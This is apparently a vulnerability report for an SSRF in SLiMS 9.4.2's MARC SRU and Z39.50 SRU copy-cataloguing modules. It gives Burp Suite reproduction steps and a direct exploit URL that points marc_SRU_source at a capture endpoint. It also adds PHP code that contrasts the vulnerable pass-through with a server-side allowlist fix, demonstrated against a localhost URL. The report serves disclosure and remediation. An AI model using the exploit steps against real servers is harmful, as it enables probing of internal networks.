The bug
A Server-Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php, due to the class in lib/marc/XMLParser.inc.php.
Reproduce
Steps to reproduce the behavior:
Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography, then go to copy cataloguing.
Choose between marc sru or z3950sru.
Type whatever you want in the search bar.
Turn Burp Suite intercept on.
Change the z3950_SRU_source or marc_SRU_source parameter value to some URL that captures the traffic.
Forward the request.
Or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN
Screenshots
Normal requests
Tampered and SSRF trigger (netcat)
Tampered and SSRF trigger (toptal.com)
Versions
OS: MacOS Mojave 10.14.6
Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64)
Slims Version: slims9_bulian-9.4.2
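The report boils down to the server fetching whatever URL arrives in the marc_SRU_source / z3950_SRU_source request parameter. The snippet below is an added illustration, not code from SLiMS or from the reporter: it places the pass-through pattern next to a lookup-by-key design, where the browser may only select among administrator-configured SRU endpoints and the server never builds a request from a client-supplied URL. The configuration array, keys, endpoint URLs and function names are all hypothetical; the query-string parameters (version, operation, query) are the standard SRU searchRetrieve parameters.

```php
<?php
// Added example, not SLiMS code. Contrasts a client-controlled endpoint URL
// (the SSRF pattern described in the report) with a server-side lookup by key.
// All names and endpoint values here are hypothetical / constructed.

// Hypothetical administrator configuration: key => SRU base URL.
// Only URLs in this array can ever be contacted by the hardened function.
$sru_sources = [
    'loc'  => 'https://lx2.loc.gov:210/LCDB',        // constructed example entry
    'coll' => 'https://sru.example.org/catalogue',   // constructed example entry
];

/** Standard SRU searchRetrieve query string for a keyword search. */
function sru_query_string(string $keywords): string
{
    return http_build_query([
        'version'   => '1.1',
        'operation' => 'searchRetrieve',
        'query'     => $keywords,
    ]);
}

/**
 * Pass-through pattern: the request supplies the full endpoint URL, so whoever
 * controls the parameter controls which host the server connects to.
 */
function build_sru_url_unsafe(string $source_from_request, string $keywords): string
{
    return $source_from_request . '?' . sru_query_string($keywords);
}

/**
 * Hardened pattern: the request supplies only a short key; the URL comes from
 * server-side configuration. Unknown keys are rejected before any fetch.
 */
function build_sru_url_safe(string $source_key, string $keywords, array $sources): ?string
{
    if (!array_key_exists($source_key, $sources)) {
        return null; // caller reports "unknown source"; nothing is requested
    }
    $base = $sources[$source_key];
    // Defence in depth: even configured entries must be plain http(s) URLs.
    $scheme = parse_url($base, PHP_URL_SCHEME);
    if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
        return null;
    }
    return $base . '?' . sru_query_string($keywords);
}

// Demonstration with constructed inputs.
$attacker_url = 'http://127.0.0.1:8008/internal-service';

// Unsafe: the server would issue a request to the attacker-chosen host.
echo build_sru_url_unsafe($attacker_url, 'aaaaaaaa'), PHP_EOL;

// Safe: a configured key yields the administrator's endpoint ...
var_dump(build_sru_url_safe('loc', 'aaaaaaaa', $sru_sources));

// ... and a URL (or any unknown string) in place of a key yields NULL.
var_dump(build_sru_url_safe($attacker_url, 'aaaaaaaa', $sru_sources));
```

The design point is that the SRU parameter sent by the browser should identify an entry in server-side configuration, not carry the destination itself; once the URL never comes from the request, the tampering step in the reproduction above has nothing to tamper with.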